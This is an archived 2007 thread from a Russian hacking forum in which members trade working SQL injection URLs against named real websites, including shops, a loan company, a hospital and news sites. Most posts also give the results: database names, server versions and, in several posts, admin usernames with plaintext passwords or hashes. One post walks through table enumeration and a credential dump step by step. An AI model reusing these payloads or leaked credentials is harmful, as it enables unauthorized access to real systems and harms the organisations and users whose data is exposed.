ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.12.2007, 20:46
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Код:
PR:4
http://www.iron.org/chamber/members.php?id=-502+union+select+1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
usr51730_chamber:usr51730_usr5173@localhost:4.1.22-standard-log
PR:6
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,user(),0x3a,version()),12,13/*
eamesgal_eostore:eamesgal@localhost:4.0.27-standard
PR:5
http://www.modculture.co.uk/books/review.php?id=-107'+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.20:modculture2:modculture@localhost
PR:4
http://www.intlstockexchange.com/CompanyProfile.php?id=-25+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
|
|
|
02.12.2007, 20:59
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
communizm.ru
Код:
http://communizm.ru/index.php?mode=comment&id=-394+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14/*
5.0.32-Debian_7etch1-log
www.avd.org.ua
Код:
http://www.avd.org.ua/viewdetails.php?id=-7146+UNION+SELECT+1,username,3,4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
4.1.22-log
aufo.ru
Код:
http://www.aufo.ru/autoinfo/?page=2&id=-45+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67/*
5.0.26
reutov.net
Код:
http://reutov.net/iss/photo_news/news/newsone.php?id=-686+UNION+SELECT+1,2,3,4,name,pass,7,8,9+from+users+limit+3,1/*
name: administrator
hash: c587975a6d5d82fffbe877b0292e3cfc
|
|
|
|
02.12.2007, 22:14
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
Код:
http://www.ruclimat.ru/categor/index.php?id_categor=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13/*
http://www.directmarketing.com.ua/print.php?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/*
http://www.recipe.ru/docs/nd/print.php?id=-1+union+select+version(),2,3,4,5/*
http://www.slavneft.ru/declarations/print.php?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8/*
http://www.homeair.ru/news/view.php?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13/*
http://profisport.com.ua/print.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
http://www.ekosdom.com.ua/print.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
http://moise.sefarad.org/print.php?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://avtoradiator.com/print.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
Каму интересно, может продолжить ковырять, заодно и мне расскажите чего нашли интересного  |
|
|
|
02.12.2007, 23:30
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Интернет портал HandsPC
www.handspc.ru
Код:
http://www.handspc.ru/soft/soft.php?id=183+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
4.0.18-1.gm-log
Код:
http://www.handspc.ru/soft/soft.php?id=183+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+--+
Код:
admin:3e8d9e88574ded0d
|
|
|
|
03.12.2007, 00:08
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
PR:2
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11/*
igwane_be@eu1473m.lyceu.net:5.0.24alyceu-log:igwane_be_1
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+1,1/*
count = 162...ppc
На этом мое желание работать дальше с лимитом почему-то иссякло =/
|
|
|
|
03.12.2007, 01:10
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.onesimpleloan.com/
Код:
http://www.onesimpleloan.com/news_display.asp?news_id=1+or+1=(SELECT+TOP+1+cast(userna me+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+cms_users)--
Admin:lcpa!87
http://www.fnplzen.cz/
Код:
http://www.fnplzen.cz/novinky_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(admName+as+nvarchar)%2B%27%3A%27%2Bcast(admPHash+as+nvarchar)+from+tblQNAdmin)--
admin:-280742843
http://www.justrams.com/
Код:
http://www.justrams.com/contents/news/news_view.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+justrams_admin)--
adminjr:#jr$2007
http://www.intellijock.com/
Код:
http://www.intellijock.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins+where+admin_id=1)--
Последний раз редактировалось Ded MustD!e; 03.12.2007 в 02:31..
|
|
|
|
03.12.2007, 03:31
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
БД 5 значит смотрим 140 таблиц сами 
Код HTML:
http://www.mountain.ru/news/index.php?id_class_news=-0%20union%20select%20concat(user_name,0x3a,password)+FROM+user/*
Искать в исходном тексте сайта после "<option value='/news/index.php?id_class_news=" |
|
|
|
03.12.2007, 11:19
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Код:
http://www.falsecode.ru/fileinfo.php?id=77+and+ascii(lower(substring(version(),1,1)))=0x33/*
...ппц, такие динозавры еще живы? |
|
|
|
03.12.2007, 12:33
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
www.realmusic.ua
Код:
http://www.realmusic.ua/buy.php?id=-1+union+select+1/*
www.rebellino.it
Код:
http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
Sql47718@62.149.140.24
Sql47718_3
4.0.27-standard-log
www.3onweb.it
Код:
http://www.3onweb.it/download/guide/focuson.php?id=-1+union+select+1,2,3,4/*
тут ничего не выйдет =(
Последний раз редактировалось Mike 007; 03.12.2007 в 12:58..
|
|
|
|
03.12.2007, 13:16
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Fata1ex, хекед
Узнаём имя БД и таблицу
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(table_schema,char(58),table_name),5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+2,1/*
igwane_be_5.members
Узнаём столбцы
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,column_name,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=0x6D656D62657273+limit+3,1/*
login,password
Ну и хек
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11+from+igwane_be_5.members/*
admin:exuifoLgJGROk
Есть ещё таблица igwane_be_3.eck_user
Код:
http://et.igwane.be/page.php?id=-7+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11+from+igwane_be_3.eck_user+limit+1,1/*
С помощью https://forum.antichat.ru/showpost.php?p=401199&postcount=18
Последний раз редактировалось v1ru$; 03.12.2007 в 13:20..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
